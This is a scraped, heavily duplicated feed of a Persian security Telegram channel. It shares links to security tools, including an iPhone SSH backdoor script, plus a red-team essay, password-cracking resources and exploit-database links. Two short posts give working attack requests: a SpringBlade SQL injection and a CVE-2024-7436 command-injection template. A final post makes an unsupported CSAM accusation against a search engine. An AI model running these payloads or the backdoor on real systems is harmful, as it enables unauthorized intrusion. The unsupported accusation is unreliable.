iPhone -SSH-Backdoor
این یک شل اسکریپت است که یک بکدور SSH در آیفون ایجاد می کند.
https://github.com/SleepTheGod/iPhone-SSH-Backdoor
#backdoor #shell
@pfksecurity
این یک شل اسکریپت است که یک بکدور SSH در آیفون ایجاد می کند.
https://github.com/SleepTheGod/iPhone-SSH-Backdoor
#backdoor #shell
@pfksecurity
GitHub
GitHub - SleepTheGod/iPhone-SSH-Backdoor: This is a shell script that creates an SSH backdoor on an iPhone.
This is a shell script that creates an SSH backdoor on an iPhone. - SleepTheGod/iPhone-SSH-Backdoor
ابزار اسکن آسیب پذیری TPM 2.0
این ابزاری است که به زبان Golang نوشته شده است که برای اسکن چندین آسیبپذیری TPM با استفاده از کتابخانه tpm-vuln-checker ایمنی ایمنی طراحی شده است .
https://github.com/immune-gmbh/tpm-vuln-checker
#vulnerability
@pfksecurity
این ابزاری است که به زبان Golang نوشته شده است که برای اسکن چندین آسیبپذیری TPM با استفاده از کتابخانه tpm-vuln-checker ایمنی ایمنی طراحی شده است .
https://github.com/immune-gmbh/tpm-vuln-checker
#vulnerability
@pfksecurity
GitHub
GitHub - immune-gmbh/tpm-vuln-checker: Checks for tpm vulnerabilities
Checks for tpm vulnerabilities. Contribute to immune-gmbh/tpm-vuln-checker development by creating an account on GitHub.
تیم قرمز می تواند برای بسیاری از افراد معانی زیادی داشته باشد. به معنای واقعی آن، و چگونه آن را در اینجا برای هدف این وبلاگ تعریف میکنم، تیمسازی قرمز روشی است برای اتخاذ طرز فکر متخاصم - فکر کردن مثل آدم بد یا اینکه چگونه یک موقعیت ممکن است اشتباه پیش برود. درک و مشاهده اینکه چگونه ممکن است همه چیز اشتباه پیش برود و چرا داشتن این طرز فکر در زندگی روزمره بسیار مهم است. با اعمال خشونت آمیز و وحشتناک تصادفی که ظاهراً هر روز اتفاق می افتد، مهم است که درک کنید چگونه انتقادی فکر کنید و آن را در زندگی خود به کار ببرید. برای تیم های قرمز، این مهم است و با گذشت زمان تبدیل به طبیعت دوم می شود. این بسیار مهم است زیرا این نوع تفکر انتقادی کاربردی مجموعه مهارتهایی را ایجاد میکند یا آن را از بین میبرد.
پس از تقریباً 20 سال حضور و اجرای تمرینات تیم قرمز در داخل دولت ایالات متحده، اغلب از من می پرسند که چه درس هایی آموخته ام، برخی درس های مرتبط (و گاهی اوقات دشوار)، بنابراین شروع به جمع آوری لیستی از درس ها کردم. آموخته شده و در هنگام مدیریت تیم های قرمز خود باید به خاطر داشته باشید. در حالی که بسیاری از اینها مفاهیمی هستند، درسهای بدی که آموختهاند، امیدوارم خواننده آنها را در هنگام فرمولبندی و اجرای تیمهای قرمز رنگ برانگیزاننده بیابد. مثل همیشه، بازخورد و نظرات استقبال می شود. در اینجا چند درس کلیدی برای به اشتراک گذاشتن با تیم خود آورده شده است.
- مقدمه
#redlearn
@PfkSecurity
پس از تقریباً 20 سال حضور و اجرای تمرینات تیم قرمز در داخل دولت ایالات متحده، اغلب از من می پرسند که چه درس هایی آموخته ام، برخی درس های مرتبط (و گاهی اوقات دشوار)، بنابراین شروع به جمع آوری لیستی از درس ها کردم. آموخته شده و در هنگام مدیریت تیم های قرمز خود باید به خاطر داشته باشید. در حالی که بسیاری از اینها مفاهیمی هستند، درسهای بدی که آموختهاند، امیدوارم خواننده آنها را در هنگام فرمولبندی و اجرای تیمهای قرمز رنگ برانگیزاننده بیابد. مثل همیشه، بازخورد و نظرات استقبال می شود. در اینجا چند درس کلیدی برای به اشتراک گذاشتن با تیم خود آورده شده است.
- مقدمه
#redlearn
@PfkSecurity
فریم ورک استخراج حافظه volatile
https://github.com/volatilityfoundation/volatility3
شناسایی سرویس های مخفی ویندوز:
https://volatility-labs.blogspot.com/2023/03/memory-forensics-rd-illustrated-detecting-hidden-windows-services.html
#windows
@pfksecurity
https://github.com/volatilityfoundation/volatility3
شناسایی سرویس های مخفی ویندوز:
https://volatility-labs.blogspot.com/2023/03/memory-forensics-rd-illustrated-detecting-hidden-windows-services.html
#windows
@pfksecurity
GitHub
GitHub - volatilityfoundation/volatility3: Volatility 3.0 development
Volatility 3.0 development. Contribute to volatilityfoundation/volatility3 development by creating an account on GitHub.
Forwarded from Red Blue Team
🧩 اگر دنبال یک مکان برای منابع CTF هستید میتوانید از کانال ما استفاده کنید .
پست ها به دو زبان Persian & English می باشد .
@PfkCTF
پست ها به دو زبان Persian & English می باشد .
🧩 If you are looking for a place for CTF resources, you can use our channel.The posts are in Persian and English.@PfkCTF
اگر زمانی که پیروزی شما قطعی است و پرهزینه نخواهد بود، نمی جنگید. ممکن است به لحظهای برسید که مجبور شوید با تمام شانستان و تنها شانسی که در آن بقایی مخاطرهآمیز در انتظارتان است ، مبارزه کنید. حتی ممکن است سرنوشت بدتری وجود داشته باشد، ممکن است مجبور شوید زمانی که امیدی به پیروزی وجود ندارد بجنگید، زیرا بهتر است از بین بروید تا مانند برده زندگی کنید.
#وینستون_چرچیل
@pfksecurity
#وینستون_چرچیل
@pfksecurity
💡Hashmob
- بزرگترین انجمن بازیابی رمز عبور
HashMob
یک انجمن آنلاین بزرگ است که بر بازیابی رمز عبور و رمزنگاری متمرکز شده است. این به عنوان بستری برای همکاری کاربران در بهبود تحقیقات رمز عبور و کشف روندها عمل می کند. این انجمن منابعی مانند آمار، فهرست کلمات، قوانین، راهنماها و آموزش هایی را ارائه می دهد که برای محققان و آزمایش کنندگان نفوذ مفید است. علاوه بر این، HashMob از انواع الگوریتمهای هش، از جمله الگوریتمهای هشکت غیر باینری، پشتیبانی میکند و ابزارهایی برای بازیابی رمزهای عبور از فرمتهایی مانند MD5، SHA1، و ZIP و همچنین کیف پولهای دیجیتالی مانند بیتکوین و اتریوم ارائه میکند.
HashMob[.]net
میزبان طیف وسیعی از منابع رسمی و فهرست هاست که برای تسهیل فعالیت های بازیابی رمز عبور استفاده می شود. این پلتفرم همچنین کاربران را تشویق می کند تا برای تعامل و پشتیبانی بیشتر به انجمن Discord خود بپیوندند .
لینک:
https://hashmob.net/
@PfkSecurity
- بزرگترین انجمن بازیابی رمز عبور
HashMob
یک انجمن آنلاین بزرگ است که بر بازیابی رمز عبور و رمزنگاری متمرکز شده است. این به عنوان بستری برای همکاری کاربران در بهبود تحقیقات رمز عبور و کشف روندها عمل می کند. این انجمن منابعی مانند آمار، فهرست کلمات، قوانین، راهنماها و آموزش هایی را ارائه می دهد که برای محققان و آزمایش کنندگان نفوذ مفید است. علاوه بر این، HashMob از انواع الگوریتمهای هش، از جمله الگوریتمهای هشکت غیر باینری، پشتیبانی میکند و ابزارهایی برای بازیابی رمزهای عبور از فرمتهایی مانند MD5، SHA1، و ZIP و همچنین کیف پولهای دیجیتالی مانند بیتکوین و اتریوم ارائه میکند.
HashMob[.]net
میزبان طیف وسیعی از منابع رسمی و فهرست هاست که برای تسهیل فعالیت های بازیابی رمز عبور استفاده می شود. این پلتفرم همچنین کاربران را تشویق می کند تا برای تعامل و پشتیبانی بیشتر به انجمن Discord خود بپیوندند .
لینک:
https://hashmob.net/
@PfkSecurity
Media is too big
VIEW IN TELEGRAM
DC32 - Red Team Village x Amazon
@PfkSecurity
@PfkSecurity
گزارش باجافزار ThreatLabz 2024 Zscaler نشان میدهد که باجافزار DarkAnges بزرگترین پرداخت باجافزار تاریخ را دریافت کرده است: 75،000،000 دلار
برای درک این موضوع: کسی می تواند با این پول 524 مرسدس بنز G واگن 2024 بخرد.
برای درک این موضوع: کسی می تواند با این پول 524 مرسدس بنز G واگن 2024 بخرد.
⚙ ابزارهای حفظ حریم خصوصی
• در شرایط مدرن، حفظ ناشناس بودن و حفظ حریم خصوصی در حال تبدیل شدن به یک امتیاز نادر برای معدود منتخب - شهروندان ثروتمند یا آموزش دیده فنی است که می توانند سرور و VPN خود را راه اندازی کنند، می دانند چگونه #Linux را راه اندازی کنند، فایل ها را رمزگذاری کنند، از مدیران رمز عبور استفاده کنند، مرورگر Tor و غیره.
• اما حق ارتباطات امن و خصوصی نه تنها برای نخبگان فناوری، بلکه برای مردم عادی نیز باید رعایت شود.
• حریم خصوصی یک حق مطلق انسانی است. اگر هر کشوری بخواهد این حق را برای شهروندانش محدود کند، در آن صورت شهروندان می توانند نتایج مناسبی بگیرند.
• از لینک های زیر برای یافتن ابزارهای مفید برای کمک به حفظ حریم خصوصی و رازداری خود استفاده کنید:
➡ https://github.com/cqcore/Privacy-Infosec-Tools-Resources
• راهنمای منحصر به فرد را فراموش نکنید که شامل 160 صفحه اطلاعات در مورد محافظت از هویت شما به صورت آنلاین در منابع و برنامه های مختلف است.
@PfkSecurity
• در شرایط مدرن، حفظ ناشناس بودن و حفظ حریم خصوصی در حال تبدیل شدن به یک امتیاز نادر برای معدود منتخب - شهروندان ثروتمند یا آموزش دیده فنی است که می توانند سرور و VPN خود را راه اندازی کنند، می دانند چگونه #Linux را راه اندازی کنند، فایل ها را رمزگذاری کنند، از مدیران رمز عبور استفاده کنند، مرورگر Tor و غیره.
• اما حق ارتباطات امن و خصوصی نه تنها برای نخبگان فناوری، بلکه برای مردم عادی نیز باید رعایت شود.
• حریم خصوصی یک حق مطلق انسانی است. اگر هر کشوری بخواهد این حق را برای شهروندانش محدود کند، در آن صورت شهروندان می توانند نتایج مناسبی بگیرند.
• از لینک های زیر برای یافتن ابزارهای مفید برای کمک به حفظ حریم خصوصی و رازداری خود استفاده کنید:
➡ https://github.com/cqcore/Privacy-Infosec-Tools-Resources
• راهنمای منحصر به فرد را فراموش نکنید که شامل 160 صفحه اطلاعات در مورد محافظت از هویت شما به صورت آنلاین در منابع و برنامه های مختلف است.
@PfkSecurity
GitHub
GitHub - The-Osint-Toolbox/Privacy-Infosec-Tools-Resources: A good selection of Privacy & Infosec tools that will help you understand…
A good selection of Privacy & Infosec tools that will help you understand more about how to protect your online privacy and security. - The-Osint-Toolbox/Privacy-Infosec-Tools-Resources
پایگاه داده اکسپلویت 🧑💻
https://www.exploit-db.com
https://www.milw00rm.com
https://0day.today
https://packetstormsecurity.com
https://www.windowsexploits.com
https://iedb.ir
https://www.macexploit.com
@PfkSecurity
https://www.exploit-db.com
https://www.milw00rm.com
https://0day.today
https://packetstormsecurity.com
https://www.windowsexploits.com
https://iedb.ir
https://www.macexploit.com
@PfkSecurity
Exploit-Db
OffSec’s Exploit Database Archive
The Exploit Database - Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.
SpringBlade SQL
GET /api/blade-desk/notice/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1
#exploit #poc #SQL
@pfksecurity
GET /api/blade-desk/notice/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1
#exploit #poc #SQL
@pfksecurity
CVE-2024-7436
GET /msp_info.htm?flag=cmd&cmd=payload /1.1
Host: {{Host}}
Cookie: {{Cookie}}
payload
#exploit #poc #IoT
@pfksecurity
GET /msp_info.htm?flag=cmd&cmd=payload /1.1
Host: {{Host}}
Cookie: {{Cookie}}
payload
#exploit #poc #IoT
@pfksecurity
این را در مورد CSAM میگوید، اما تمام پیازها را در موتور جستجوی خود که هنوز CSAM دارند، حتی اگر قابل جستجو نباشد، فاش میکند. لطفا از Ahmia استفاده نکنید.
https://ahmia.fi/onions/
@pfksecurity
https://ahmia.fi/onions/
@pfksecurity